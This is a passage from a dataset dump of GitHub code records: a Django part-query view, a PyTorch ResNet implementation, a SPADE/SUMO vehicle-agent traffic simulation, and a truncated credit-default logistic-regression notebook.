partqry(request):\n wo_nop = empmast.objects.none()\n tm=shop_section.objects.all()\n tmp=[]\n for on in tm:\n tmp.append(on.section_code)\n context={\n 'sub':0,\n 'lenm' :2,\n 'nav':g.nav,\n 'subnav':g.subnav,\n 'ip':get_client_ip(request),\n 'roles':tmp\n }\n return render(request,'MISC/PARTQRY/partqry.html',context)\n\n\ndef partqry1(request):\n if request.method == 'GET' and request.is_ajax(): \n \n part= request.GET.get('Txtpart_no')\n data_list=list(Partnew.objects.filter(gm_ptno=part).values('gm_ptno','des','part_no','it_cat','um','mb').distinct()) \n if(len(data_list)>0):\n return JsonResponse(data_list,safe = False)\n else:\n data_list=list(Partnew.objects.filter(part_no=part).values('gm_ptno','des','part_no','it_cat','um','mb').distinct())\n if(len(data_list)>0):\n return JsonResponse(data_list,safe = False) \n return JsonResponse({\"success\":False},status=400)\n\n","repo_name":"CRISITPI/DLW2","sub_path":"dlw/views/misc/partqry/part_qry.py","file_name":"part_qry.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42936173488","text":"import torch.nn as nn\nimport torch\n\n\nclass BasicBlock(nn.Module): # 18层和34层\n expansion = 1 # 残差结构第三层卷积核个数是第一层的1倍\n\n def __init__(self, in_channel, 
out_channel, stride=1, downsample=None):\n        # downsample代表下采样结构,就是我们残差结构的残差分支(也就是虚线部分),起到升维的作用\n        super(BasicBlock, self).__init__()\n        self.conv1 = nn.Conv2d(in_channels=in_channel, out_channels=out_channel, kernel_size=3, stride=stride, padding=1,\n                               bias=False)\n        self.bn1 = nn.BatchNorm2d(out_channel)\n        self.relu = nn.ReLU(inplace=True)\n\n        self.conv2 = nn.Conv2d(in_channels=out_channel, out_channels=out_channel, kernel_size=3, stride=1, padding=1,\n                               bias=False)\n        self.bn2 = nn.BatchNorm2d(out_channel)\n        self.downsample = downsample\n\n    def forward(self,x):\n        identity = x  # identity为特征矩阵\n        if self.downsample is not None:\n            identity = self.downsample(x)\n\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu(out)\n\n        out = self.conv2(out)\n        out = self.bn2(out)\n\n        out += identity  # 最后将主分支和残差分支的特征矩阵相加\n        out = self.relu(out)  # 残差结构最后一次先将特征矩阵相加,然后再是要激活函数\n\n        return out\n\n\nclass Bottleneck(nn.Module):  # 50层,101层,152层\n    expansion = 4  # 残差结构的第三层卷积核个数是第一层的4倍\n\n    def __init__(self, in_channel, out_channel, stride=1, downsample=None):\n        super(Bottleneck, self).__init__()\n        self.conv1 = nn.Conv2d(in_channels=in_channel,out_channels=out_channel,kernel_size=1,stride=1,bias=False)\n        self.bn1 = nn.BatchNorm2d(out_channel)\n\n        self.conv2 = nn.Conv2d(in_channels=out_channel,out_channels=out_channel, kernel_size=3,padding=1,stride=1,bias=False)\n        self.bn2 = nn.BatchNorm2d(out_channel)\n\n        # 残差结够最后一层的卷积核个数是第一层的4倍,所以输出个数也是第一层的4倍 但无论怎样最终输出一个特征矩阵,包含了一个batch多张图片的信息\n        self.conv3 = nn.Conv2d(in_channels=out_channel,out_channels=out_channel*self.expansion,kernel_size=1,stride=1,bias=False)\n        self.bn3 = nn.BatchNorm2d(out_channel*self.expansion)\n\n        self.relu = nn.ReLU(inplace=True)\n        self.downsample = downsample\n\n    def forward(self,x):\n        identity = x\n        if self.downsample is not None:\n            identity = self.downsample(x)\n\n        out = self.conv1(x)\n        out = self.bn1(out)\n        out = self.relu(out)\n\n        out = self.conv2(out)\n        out = self.bn2(out)\n        out = self.relu(out)\n\n        out = self.conv3(out)\n        out = self.bn3(out)\n        out += identity\n        out = self.relu(out)\n\n        return out\n\n\nclass ResNet(nn.Module):\n    def __init__(self,block, block_num, num_classes=1000,include_top=True):\n        # block是根据我们的层数选用不同的残差结构,class_num是一个列表,返回的是不同层(conv2_x,conv3_x,conv4_x)使用的残差结构的数目\n        super(ResNet, self).__init__()\n        self.include_top = include_top\n        self.in_channel = 64  # 残差结构的输入通道为64,不是刚开始加载图片的通道,刚开始的RGB图像的通道为3\n\n        self.conv1 = nn.Conv2d(3,out_channels=self.in_channel,kernel_size=7,stride=2,padding=3,bias=False)\n        self.bn1 = nn.BatchNorm2d(self.in_channel)\n        self.relu = nn.ReLU(inplace=True)\n        self.maxpool = nn.MaxPool2d(kernel_size=3,stride=2,padding=1)\n\n        self.layer1 = self._make_layer(block,64,block_num[0])  # 对应笔记的conv2-x 64代表第一层输出64通道\n        self.layer2 = self._make_layer(block, 128, block_num[1], stride=2)  # 对应笔记的conv3-x 第一层输出128通道\n        self.layer3 = self._make_layer(block, 256, block_num[2], stride=2)  # 对应笔记的conv4-x 第一层输出256通道\n        self.layer4 = self._make_layer(block, 512, block_num[3], stride=2)  # 对应笔记的conv5-x 第一层输出512通道\n\n        if self.include_top:\n            self.avgpool = nn.AdaptiveAvgPool2d((1,1))  # 平均池化\n            self.fc = nn.Linear(512*block.expansion,num_classes)\n\n        for m in self.modules():\n            if isinstance(m,nn.Conv2d):\n                nn.init.kaiming_normal_(m.weight,mode='fan_out',nonlinearity='relu')\n    def _make_layer(self,block,channel,block_num,stride=1):\n        # block根据层数不同,选择少层数的残差结构或多层数的残差结构\n        # channel是conv2_x或conv3_x或conv4_x或conv5_x的第一层卷积核的个数,也即是输出通道个数\n        # block_num就是一列表,对应conv2_x或conv3_x或conv4_x或conv5_x各自的层数\n        downsample = None\n        if stride !=1 or self.in_channel != channel * block.expansion:  # 18层和34层跳过该语句,50,101层进入该语句,进行下采样\n            # self.in_channel固定了64,而18和34层对应expansion=1,conv2_x或conv3_x或conv4_x或conv5_x第一层和最后一层卷积核个数相等,也即输出通道相等\n            # 而50和101层,对应expansion=4,conv2_x或conv3_x或conv4_x或conv5_x,最后一层的卷积核个数是第一层的4倍\n            downsample = nn.Sequential(\n                nn.Conv2d(self.in_channel,channel*block.expansion,kernel_size=1,stride=stride,bias=False),\n                # 下采样只升维或降维,改变深度,不改变高和宽,所以kernel_size=1,stride=stride=1\n                nn.BatchNorm2d(channel*block.expansion)\n            )\n\n        layers = []\n        layers.append(block(self.in_channel, channel, downsample=downsample, stride=stride))\n        self.in_channel = channel * block.expansion  # 18层和34层不会改变,50和101层, conv2_x或conv3_x或conv4_x或conv5_x,最后一层的卷积核个数是第一层的4倍\n\n        for _ in range(1,block_num):  # 构建实线残差结构部分\n            layers.append(block(self.in_channel, channel))\n\n        return nn.Sequential(*layers)\n\n    def forward(self,x):\n        x = self.conv1(x)  # 第一层卷积层\n        x = self.bn1(x)\n        x = self.relu(x)\n        x = self.maxpool(x)\n\n        x = self.layer1(x)  # 进入残差结构 分别对应conv2_x或conv3_x或conv4_x或conv5_x,\n        x = self.layer2(x)\n        x = self.layer3(x)\n        x = self.layer4(x)\n\n        if self.include_top:\n            x = self.avgpool(x)\n            x = torch.flatten(x,1)  # 传递给线性层之前进行扁平化操作\n            x = self.fc(x)\n\n        return x\n\n\ndef resnet34(num_classes=1000,include_top=True):  # 34层ResNet\n    return ResNet(BasicBlock,[3,4,6,3],num_classes=num_classes,include_top=include_top)\n\ndef resnet101(num_classes=1000,include_top=True):  # 101层ResNet\n    return ResNet(Bottleneck,[3,4,23,3],num_classes=num_classes,include_top=include_top)","repo_name":"spasmodic123/QG_SUMMER_CAMP","sub_path":"Daily/2023.7.16/code/ResNet.py","file_name":"ResNet.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4630126824","text":"# -*- coding: utf-8 -*-\n\n# sumo imports\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport subprocess\nimport random\nimport sys\nimport getopt\nimport os\nfrom optparse import OptionParser\n\n# spade imports\nimport spade\nimport time\nimport ast\n\nhost = \"127.0.0.1\"\nfile = open('log.txt', 'a')\nsys.stdout = file\n\n\"\"\"\nAgente que representa um veículo.\n\"\"\"\nclass VehicleAgent(spade.Agent.Agent):\n\n    \"\"\"\n    Construtor\n    \"\"\"\n    def __init__(self, ip, _pass, origin, destination, debug):\n        spade.Agent.Agent.__init__(self, ip, _pass)\n        self.debug = debug\n        self.origin = origin\n        self.destination = destination\n        self.neighbours = []\n        self.nb_pref = {}\n        self.change_direction = True if origin != destination else False\n        self.norm_right = False\n        self.rightOfWay = False\n\n        self.vehicle_ID = None\n        self.vehicle_angle = None\n        self.vehicle_signals = None\n        self.vehicle_left_blink = None\n        self.vehicle_right_blink = None\n        self.vehicle_state = \"\"\n\n    def _setup(self):\n\n        self.STATE_ZERO_CODE = 0\n        self.STATE_ONE_CODE = 1\n        self.STATE_TWO_CODE = 2\n        self.STATE_THREE_CODE = 3\n        self.STATE_FOUR_CODE = 4\n        self.STATE_FIVE_CODE = 5\n        self.STATE_SIX_CODE = 6\n        self.STATE_SEVEN_CODE = 7\n\n        self.TRANSITION_TO_ZERO = 00\n        self.TRANSITION_TO_ONE = 10\n        self.TRANSITION_TO_TWO = 20\n        self.TRANSITION_TO_THREE = 30\n        self.TRANSITION_TO_FOUR = 40\n        self.TRANSITION_TO_FIVE = 50\n        self.TRANSITION_TO_SIX = 60\n        self.TRANSITION_TO_SEVEN = 70\n        self.TRANSITION_DEFAULT = 1000\n\n        fsm = spade.Behaviour.FSMBehaviour()\n\n        fsm.registerFirstState(self.StartBehaviour(), self.STATE_ZERO_CODE)\n        fsm.registerState(self.ArriveBehaviour(), self.STATE_ONE_CODE)\n        fsm.registerState(self.HelloBehaviour(), self.STATE_TWO_CODE)\n        fsm.registerState(self.WaitBehaviour(), 
self.STATE_THREE_CODE)\n fsm.registerState(self.DecideBehaviour(), self.STATE_FOUR_CODE)\n fsm.registerState(self.DecideToStayBehaviour(), self.STATE_FIVE_CODE)\n fsm.registerState(self.DecideToGoBehaviour(), self.STATE_SIX_CODE)\n fsm.registerLastState(self.GoneBehaviour(), self.STATE_SEVEN_CODE)\n\n fsm.registerTransition(self.STATE_ZERO_CODE, self.STATE_ZERO_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_ZERO_CODE, self.STATE_ZERO_CODE, self.TRANSITION_TO_ZERO)\n fsm.registerTransition(self.STATE_ZERO_CODE, self.STATE_ONE_CODE, self.TRANSITION_TO_ONE)\n\n fsm.registerTransition(self.STATE_ONE_CODE, self.STATE_ONE_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_ONE_CODE, self.STATE_TWO_CODE, self.TRANSITION_TO_TWO)\n\n fsm.registerTransition(self.STATE_TWO_CODE, self.STATE_TWO_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_TWO_CODE, self.STATE_THREE_CODE, self.TRANSITION_TO_THREE)\n\n fsm.registerTransition(self.STATE_THREE_CODE, self.STATE_THREE_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_THREE_CODE, self.STATE_FOUR_CODE, self.TRANSITION_TO_FOUR)\n\n fsm.registerTransition(self.STATE_FOUR_CODE, self.STATE_FOUR_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_FOUR_CODE, self.STATE_FIVE_CODE, self.TRANSITION_TO_FIVE)\n fsm.registerTransition(self.STATE_FOUR_CODE, self.STATE_SIX_CODE, self.TRANSITION_TO_SIX)\n\n fsm.registerTransition(self.STATE_FIVE_CODE, self.STATE_FIVE_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_FIVE_CODE, self.STATE_TWO_CODE, self.TRANSITION_TO_TWO)\n\n fsm.registerTransition(self.STATE_SIX_CODE, self.STATE_SIX_CODE, self.TRANSITION_DEFAULT)\n fsm.registerTransition(self.STATE_SIX_CODE, self.STATE_SEVEN_CODE, self.TRANSITION_TO_SEVEN)\n\n self.addBehaviour(fsm, None)\n\n template = spade.Behaviour.ACLTemplate()\n # template.setSender(spade.AID.aid(\"car1@\" + host, [\"xmpp://car1@\" + host]))\n template.setOntology(\"Car2X\")\n template.setProtocol(\"WAVE\")\n t = spade.Behaviour.MessageTemplate(template)\n self.addBehaviour(self.RecvMsgBehaviour(), t)\n\n\n def getVehicleState(self):\n return self.vehicle_state\n\n \"\"\"\n Coleta dados do SUMO para auxiliar o mecanismo de decisão do agente.\n \"\"\"\n def collectSumoData(self, vehID, data):\n\n self.vehicle_ID = vehID\n self.vehicle_angle = round(data[tc.VAR_ANGLE], 2)\n\n self.vehicle_signals = '{:013b}'.format(data[tc.VAR_SIGNALS]) # Got vehicle signals from http://sumo.dlr.de/wiki/TraCI/Vehicle_Signalling\n\n self.vehicle_right_blink = bool(int(self.vehicle_signals[12]))\n self.vehicle_left_blink = bool(int(self.vehicle_signals[11]))\n\n \"\"\"\n Adiciona vizinhos para envio de mensagens.\n \"\"\"\n def addNeighbour(self, neighbour):\n self.neighbours.append(neighbour)\n\n \"\"\"\n Verifica se posição de vizinho está à direita.\n \"\"\"\n def checkRightSide(self, direction):\n\n self.carAtRight = None\n\n if self.origin == direction:\n self.carAtRight = False\n else:\n if self.origin == \"NORTH\":\n self.carAtRight = True if direction == \"WEST\" else False\n elif self.origin == \"SOUTH\":\n self.carAtRight = True if direction == \"EAST\" else False\n elif self.origin == \"WEST\":\n self.carAtRight = True if direction == \"SOUTH\" else False\n elif self.origin == \"EAST\":\n self.carAtRight = True if direction == \"NORTH\" else False\n\n return self.carAtRight\n\n \"\"\"\n Verifica se o vizinho vai mudar de direção\n \"\"\"\n def checkChangeDirection(self, origin, destination):\n\n if origin 
!= destination:\n            return True\n        else:\n            return False\n\n    \"\"\"\n    Prepara mensagem a ser enviada por agente.\n    \"\"\"\n    def prepareMessage(self, status):\n        self.msg = spade.ACLMessage.ACLMessage()\n        self.msg.setPerformative(\"inform\")\n        self.msg.setLanguage(\"OWL-S\")\n        self.msg.setOntology(\"Car2X\")\n        self.msg.setProtocol(\"WAVE\")\n        self.content = \"{'status':'\"+ status + \"','from':'\" + self.origin + \"','to':'\" + self.destination + \"'}\"\n        self.msg.setContent(self.content)\n\n        return self.msg\n\n    def removeNeighbour(self, neighbour):\n        self.neighbours.remove(neighbour)\n\n    \"\"\"\n    Comportamento de recebimento de mensagens.\n    \"\"\"\n    class RecvMsgBehaviour(spade.Behaviour.EventBehaviour):\n\n        def _process(self):\n            msg = self._receive(True, None)\n\n            self.content = ast.literal_eval(msg.getContent())\n            self.status = self.content['status']\n            self.origin = self.content['from']\n            self.dest = self.content['to']\n\n            if msg.getSender() in self.myAgent.neighbours:\n\n                if self.status == \"COMING\":\n                    self.myAgent.rightOfWay = False\n                    self.myAgent.nb_pref[msg.getSender().getName()] = False\n                    # print(str(self.myAgent.getName()) + \"| Got message COMING from \" + msg.getSender().getName() + \". It is crossing now.\")\n\n                elif self.status == \"WAITING\":\n\n                    self.right_position = self.myAgent.checkRightSide(self.origin)\n                    self.change_direction = self.origin != self.dest\n\n                    # Trata vizinhos que estiverem à direita\n                    if not self.right_position:\n                        self.myAgent.nb_pref[msg.getSender().getName()] = True\n                    else:\n                        self.myAgent.nb_pref[msg.getSender().getName()] = True if self.change_direction else False\n\n                    # print(str(self.myAgent.getName()) + \"| Got message WAITING from \" + msg.getSender().getName() + \". My right-of-way compared to it is \" + self.myAgent.nb_pref[msg.getSender().getName()] + \".\")\n\n                else: # self.status == \"GONE\"\n                    self.myAgent.nb_pref.pop(msg.getSender().getName())\n                    # print(str(self.myAgent.getName()) + \"| Got message GONE from \" + msg.getSender().getName() + \". It has gone.\")\n\n                if bool(self.myAgent.nb_pref):\n                    if self.myAgent.change_direction:\n                        self.myAgent.rightOfWay = False\n                        # print(str(self.myAgent.getName()) + \"| I'm about to make a turn and other car(s) have right-of-way.\")\n                    else:\n                        self.myAgent.rightOfWay = False if False in self.myAgent.nb_pref.values() else True\n                        # print(str(self.myAgent.getName()) + \"| I have right-of-way.\")\n                else:\n                    self.myAgent.rightOfWay = True\n                    # print(str(self.myAgent.getName()) + \"| I'm about to make a turn and I have right-of-way.\")\n\n            # if self.myAgent.debug:\n            #     print str(self.myAgent.getName()) + \"| Messagem from \" + str(msg.getSender().getName()) + \". Status \" + self.status + \" Origin \" + self.origin + \". Right of way is \" + str(self.right) + \". 
General right of way is \" + str(self.myAgent.rightOfWay) + \".\"\n # print self.myAgent.nb_pref\n\n \"\"\"\n Comportamento de criação de veículo no SUMO\n \"\"\"\n class StartBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"start\"\n if self.myAgent.vehicle_ID != None:\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Starting Behaviours.\")\n # file.flush()\n self._exitcode = self.myAgent.TRANSITION_TO_ONE\n else:\n self._exitcode = self.myAgent.TRANSITION_TO_ZERO\n\n \"\"\"\n Comportamento de chegada de veículos ao cruzamento.\n \"\"\"\n class ArriveBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"arrive\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Arriving at crossing.\")\n\n time.sleep(1)\n self._exitcode = self.myAgent.TRANSITION_TO_TWO\n\n \"\"\"\n Comportamento que envia mensagem de interesse em atravessar o cruzamento.\n \"\"\"\n class HelloBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"hello\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Sending message.\")\n # file.flush()\n\n ######## send Message \"Waiting\" ########\n self.msg = self.myAgent.prepareMessage(\"WAITING\")\n for receiver in self.myAgent.neighbours:\n self.msg.addReceiver(receiver)\n self.myAgent.send(self.msg)\n #######################################\n time.sleep(1)\n self._exitcode = self.myAgent.TRANSITION_TO_THREE\n\n \"\"\"\n Comportamento que aguarda mensagens de outros agentes carros.\n \"\"\"\n class WaitBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"wait\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Waiting.\")\n # file.flush()\n\n time.sleep(1)\n # print str(self.myAgent.getName()) + \"| Waiting time is over.\"\n self._exitcode = self.myAgent.TRANSITION_TO_FOUR\n\n\n \"\"\"\n Comportamento que contém o mecanismo de decisão que pode escolher (aguardar\n ou atravessar) baseando-se nas normas e nas mensagens recebidas.\n \"\"\"\n class DecideBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"decide\"\n if self.myAgent.debug:\n print(str(self.myAgent.getName()) + \"| Deciding.\")\n # file.flush()\n time.sleep(3)\n # if permission_to_go && norms_checked\n\n\n if self.myAgent.rightOfWay :\n self._exitcode = self.myAgent.TRANSITION_TO_SIX\n else:\n self._exitcode = self.myAgent.TRANSITION_TO_FIVE\n\n \"\"\"\n Comportamento que dispara mensagem e espera para atravessar.\n \"\"\"\n class DecideToStayBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"stay\"\n if self.myAgent.debug:\n print(str(self.myAgent.getName()) + \"| Staying.\")\n\n time.sleep(1)\n # if self.myAgent.getName() == \"car1@127.0.0.1\":\n self.myAgent.permission_to_go = True\n self._exitcode = self.myAgent.TRANSITION_TO_TWO\n\n \"\"\"\n Comportamento que dispara mensagem e atravessa o cruzamento.\n \"\"\"\n class DecideToGoBehaviour(spade.Behaviour.OneShotBehaviour):\n\n def _process(self):\n self.myAgent.vehicle_state = \"go\"\n if self.myAgent.debug:\n print (str(self.myAgent.getName()) + \"| Coming.\")\n\n ######## send Message \"Coming\" ########\n self.msg = self.myAgent.prepareMessage(\"COMING\")\n for receiver in self.myAgent.neighbours:\n self.msg.addReceiver(receiver)\n self.myAgent.send(self.msg)\n 
#######################################\n            time.sleep(2)\n            self._exitcode = self.myAgent.TRANSITION_TO_SEVEN\n\n    \"\"\"\n    Comportamento que dispara mensagem e conclui a travessia do cruzamento.\n    \"\"\"\n    class GoneBehaviour(spade.Behaviour.OneShotBehaviour):\n\n        def _process(self):\n            self.myAgent.vehicle_state = \"gone\"\n            if self.myAgent.debug:\n                print(str(self.myAgent.getName()) + \"| Crossing complete.\")\n                # file.flush()\n\n            ######## send Message \"Gone\" ##########\n            self.msg = self.myAgent.prepareMessage(\"GONE\")\n            for receiver in self.myAgent.neighbours:\n                self.msg.addReceiver(receiver)\n            self.myAgent.send(self.msg)\n            #######################################\n\n            time.sleep(3)\n            self._exitcode = self.myAgent.TRANSITION_DEFAULT\n            self.myAgent._kill()\n\n\ntry: # we need to import python modules from the $SUMO_HOME/tools directory\n    sys.path.append(os.path.join(os.path.dirname(\n        __file__), '..', '..', '..', '..', \"tools\")) # tutorial in tests\n    sys.path.append(os.path.join(os.environ.get(\"SUMO_HOME\", os.path.join(\n        os.path.dirname(__file__), \"..\", \"..\", \"..\")), \"tools\")) # tutorial in docs\n    from sumolib import checkBinary # noqa\nexcept ImportError:\n    sys.exit(\n        \"please declare environment variable 'SUMO_HOME' as the root directory of your sumo installation (it should contain folders 'bin', 'tools' and 'docs')\")\n\nimport traci\nimport traci.constants as tc\n\n\ndef runSumo():\n\n    sumoBinary = \"/home/lauro/Documentos/Mestrado/T3/sumo/sumo-0.32.0/bin/sumo-gui\"\n    sumoCmd = [sumoBinary, \"-c\", \"../sumo/cross.sumocfg\"]\n\n    # SUMO Magic\n    traci.start(sumoCmd)\n    junctionID = \"0\"\n    traci.junction.subscribeContext(junctionID, tc.CMD_GET_VEHICLE_VARIABLE, 15, [tc.VAR_SPEED, tc.VAR_ANGLE, tc.VAR_SIGNALS, tc.VAR_EDGES])\n\n    # for step in range(100):\n    while traci.simulation.getMinExpectedNumber() > 0:\n        # print(step)\n        traci.simulationStep()\n        data = traci.junction.getContextSubscriptionResults(junctionID)\n\n        if str(type(data)) == \"<class 'dict'>\":\n            for car in data:\n                agent = agents[car]\n                agent.collectSumoData(car, data[car])\n\n\n                if agent.getVehicleState() == \"start\":\n                    traci.vehicle.setSpeed(car, 0)\n                elif agent.getVehicleState() == \"wait\":\n                    traci.vehicle.setSpeed(car, 0)\n                elif agent.getVehicleState() == \"go\":\n                    traci.vehicle.setSpeed(car, -1)\n\n    file.close()\n    traci.close()\n\n\nif __name__== \"__main__\":\n\n# As normas em cruzamento de veículos sempre acabam dependendo da sinalização (vertical/horizontal) para auxiliar a tomada de decisão no trânsito.\n# Para 3 carros\n# A norma da preferência de quem estiver a direita resolve a definição de prioridade.\n# Para 2 carros\n# A norma da preferência a direita resolve a definição de prioridade em 4 dos 6 casos.\n# Para os carros em paralelo, pode-se usar a norma da mudança de direção. 
(o que muda de direção perde a prioridade)\n# Para os carros em paralelo, não é necessário usar norma de prioridade se ambos estão em faixas diferentes e vão para direções opostas.\n# Para carros em paralelo mudando de direção para o mesmo destino, não sei como priorizar.\n# Para 4 carros\n\n\n # Caso Base\n# Preferencia red, pink, yellow\n red = VehicleAgent(\"red\" + \"@\" + host, \"secret\", \"EAST\", \"NORTH\", True)\n pink = VehicleAgent(\"pink\" + \"@\" + host, \"secret\", \"WEST\", \"WEST\", True)\n yellow = VehicleAgent(\"yellow\" + \"@\" + host, \"secret\", \"SOUTH\", \"SOUTH\", True)\n\n# Preferencia pink, yellow, red\n # red = VehicleAgent(\"red@\" + host, \"secret\", \"EAST\", \"NORTH\", True)\n # yellow = VehicleAgent(\"yellow@\" + host, \"secret\", \"NORTH\", \"NORTH\", True)\n # pink = VehicleAgent(\"pink@\" + host, \"secret\", \"WEST\", \"WEST\", True)\n\n# Preferencia red, yellow, pink\n # red = VehicleAgent(\"red@\" + host, \"secret\", \"EAST\", \"NORTH\", True)\n # pink = VehicleAgent(\"pink@\" + host, \"secret\", \"WEST\", \"WEST\", True)\n # yellow = VehicleAgent(\"yellow@\" + host, \"secret\", \"SOUTH\", \"SOUTH\", True)\n\n # Collecting values from simulation models to feed agent decision mechanism\n agents = {\"red\":red, \"pink\":pink, \"yellow\":yellow}\n\n red.addNeighbour(pink.getAID())\n red.addNeighbour(yellow.getAID())\n\n pink.addNeighbour(red.getAID())\n pink.addNeighbour(yellow.getAID())\n\n yellow.addNeighbour(red.getAID())\n yellow.addNeighbour(pink.getAID())\n\n red.start()\n pink.start()\n yellow.start()\n\n # red.wui.start()\n # pink.wui.start()\n # yellow.wui.start()\n\n # red.setDebugToScreen()\n # pink.setDebugToScreen()\n # yellow.setDebugToScreen()\n\n runSumo()\n","repo_name":"laurodelacerda/vehicularAgents","sub_path":"spade/sumoVehicleAgent.py","file_name":"sumoVehicleAgent.py","file_ext":"py","file_size_in_byte":18409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7057970249","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Importar pacotes necessários\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\nimport seaborn as sns\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn import preprocessing\npd.options.display.max_columns = None\n#pd.options.display.max_rows = None\nplt.rc(\"font\", size=14)\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_auc_score, roc_curve\nimport pandas_profiling\nimport warnings\nwarnings.filterwarnings(action=\"ignore\")\n\n\n# In[2]:\n\n\n# Carregar o conjunto de dados históricos dos clientes\n#df = pd.read_csv('dataset_all.csv').sample(100000, random_state=44)\ndf = pd.read_csv('dataset_all.csv')\n\n\n# In[3]:\n\n\ndf.head()\n\n\n# In[4]:\n\n\ndf.dtypes\n\n\n# In[5]:\n\n\ndf.shape\n\n\n# In[6]:\n\n\n#missing data\ntotal = df.isnull().sum().sort_values(ascending=False)\npercent = (df.isnull().sum()/df.isnull().count()).sort_values(ascending=False)\nmissing_data = pd.concat([total, percent], axis=1, keys=['Total', 
'Percent'])\nmissing_data\n\n\n# In[7]:\n\n\ndf.drop(['ID da conta','tipo pessoa','é flexível no limite','data de vencimento - credito','é Prestação - credito','data de vencimento - financiamento','data de vencimento - emprestimo' ,'ID de consentimento','transações de valor - credito' ,'quantia - conta','Valor do pagamento - credito','data de pagamento - credito'], inplace=True, axis=1)\n\n\n# In[8]:\n\n\ndf\n\n\n# In[9]:\n\n\n#verifica se é inadimplente\ndf['divida_total'] = df[['valor total da fatura - credito', 'saldo pendente do contrato - financiamento', 'saldo pendente do contrato - emprestimo']].sum(axis=1)\ndf['divida_atrasada'] = df[['Prestações devidas - emprestimo', 'Prestações devidas - financiamento']].sum(axis=1)\ndf['utilizacao_limite_cartao'] = df['Valor limite - credito'] / df['cheque especial Limite contratado']\n\ndf['utilizacao_limite_cartao'].replace([np.inf, -np.inf], -1, inplace=True)\ndf['utilizacao_limite_cartao'].replace([np.NaN], 0, inplace=True)\n\ndf['limite_negativo'] = 0\n\ndef verifica_limite(x):\n if x >= 0:\n return 0\n else:\n return 1\n\ndef verifica_inadimp(x,y): \n if (x > 0) and (y == 1):\n return 1\n else:\n return 0\n\n\n# In[10]:\n\n\n#analise_2 = df[['Valor limite - credito','cheque especial Limite contratado']]\n\n\n# In[11]:\n\n\n#analise_3 = df[df['Valor limite - credito'] <= 0]\n\n\n# In[12]:\n\n\ndf['limite_negativo'] = df['utilizacao_limite_cartao'].apply(verifica_limite)\n\n\n# In[13]:\n\n\ndf['eh_inadimplente'] = np.vectorize(verifica_inadimp)(df['divida_atrasada'], df['limite_negativo'])\n\n\n# In[14]:\n\n\ndf['limite_negativo'].value_counts()\n\n\n# In[15]:\n\n\ndf['eh_inadimplente'].value_counts()\n\n\n# In[16]:\n\n\n'''\nfrom imblearn.over_sampling import SMOTE\nimport numpy as np\n\nSEED=42\n\nsmote = SMOTE(random_state=42)\n'''\n\n\n# In[17]:\n\n\ncount_majority_class, count_minority_class = df.eh_inadimplente.value_counts()\n\n\n# In[18]:\n\n\ncount_majority_class\n\n\n# In[19]:\n\n\ndf_majority_class = df[df['eh_inadimplente'] == 0]\ndf_minority_class = df[df['eh_inadimplente'] == 1]\n\n\n# In[20]:\n\n\ndf_class_undersample = df_majority_class.sample(count_minority_class)\n\n\n# In[21]:\n\n\ndf_balanced = pd.concat([df_class_undersample, df_minority_class], axis=0)\n\n\n# In[22]:\n\n\nprint('Number of data samples after under-sampling:')\nprint(df_balanced.eh_inadimplente.value_counts())\n\n\n# In[23]:\n\n\n#smote_technique = SMOTE(sampling_strategy='minority')\n\n\n# In[24]:\n\n\nX = df_balanced.drop(\"eh_inadimplente\", axis=1)\nY = df_balanced[\"eh_inadimplente\"]\n\n\n# In[25]:\n\n\n#x_resampled, y_resampled = smote_technique.fit_resample(X, Y)\n\n\n# In[26]:\n\n\n#df_balanced = pd.concat([y_resampled, x_resampled], axis=1)\n#df_balanced\n\n\n# In[27]:\n\n\ndf_balanced[\"eh_inadimplente\"].value_counts()\n\n\n# In[28]:\n\n\n#x = df_balanced.iloc[:, 1:].values\n#y = df_balanced.iloc[:, 0].values\n\n\n# In[29]:\n\n\nX_train, X_test, y_train, y_test = train_test_split(X,Y, test_size=0.2, random_state=42)\n\n\n# In[30]:\n\n\n\nfrom sklearn.preprocessing import StandardScaler\n\n# Padronizar as variáveis numéricas\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n\n# In[31]:\n\n\n# Treinar o modelo de regressão logística\nmodelo = LogisticRegression()\n#modelo = 